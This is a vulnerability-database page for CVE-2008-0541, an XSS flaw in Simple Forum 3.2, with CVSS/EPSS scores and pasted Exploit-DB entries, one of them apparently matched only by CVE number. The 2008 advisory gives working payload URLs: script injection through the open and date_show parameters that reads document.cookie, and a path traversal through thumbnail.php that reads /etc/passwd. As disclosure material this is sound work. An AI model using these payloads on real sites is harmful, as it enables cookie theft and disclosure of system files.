CVE-2008-0541
published 2008-02-01CVE-2008-0541: Multiple cross-site scripting (XSS) vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.44%
70.0th percentile
Multiple cross-site scripting (XSS) vulnerabilities in forum.php in Gerd Tentler Simple Forum 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) open and (2) date_show parameters.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gerd_tentler | simple_forum | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
exploitdb·2019-03-13·CVSS 8.8
CVE-2019-0541 [HIGH] Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
Microsoft Windows MSHTML Engine - 'Edit' Remote Code Execution
---
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability
# Google Dork: N/A
# Date: March, 13 2019
# Exploit Author: Eduardo Braun Prado
# Vendor Homepage: http://www.microsoft.com/
# Software Link: http://www.microsoft.com/
# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
# CVE : CVE-2019-0541
The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrar
Exploit-DB
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
exploitdb·2008-01-26
CVE-2008-0542 Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
Simple Forum 3.2 - File Disclosure / Cross-Site Scripting
---
########################################################
# #
# SIMPLE FORUM v 3.2 MULTIPLE VULNERABILITIES #
# author : tomplixsee #
# my email : [email protected] #
# #
# software : SIMPLE FORUM v3.2 #
# download : http://www.gerd-tentler.de/tools/forum/#
# #
########################################################
1.XSS
vulnerable code on forum.php
">
">
.....
example:
http://target/path/forum.php?open="/>alert(document.cookie)
http://target/path/forum.php?date_show="/>alert(document.cookie)
2.Remote File Disclosure
vulnerable code on thumbnail.php
example:
http://target/path/thumbnail.php?type=3&file=../../../../../../../etc/passwd
then try to view the page source :D
salam tuk:
ira, sukabirus network communit
No writeups or analysis indexed.
http://secunia.com/advisories/28681http://www.securityfocus.com/bid/27463https://exchange.xforce.ibmcloud.com/vulnerabilities/39978https://www.exploit-db.com/exploits/4989http://secunia.com/advisories/28681http://www.securityfocus.com/bid/27463https://exchange.xforce.ibmcloud.com/vulnerabilities/39978https://www.exploit-db.com/exploits/4989
2008-02-01
Published